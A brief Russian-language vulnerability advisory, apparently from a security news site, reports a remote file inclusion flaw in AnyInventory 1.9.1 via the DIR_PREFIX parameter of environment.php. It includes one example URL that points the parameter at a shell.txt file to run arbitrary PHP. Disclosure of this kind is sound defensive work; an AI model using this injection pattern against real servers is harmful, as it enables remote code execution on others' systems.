Программа: AnyInventory 1.9.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «DIR_PREFIX» сценарием environment.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?



Оставить мнение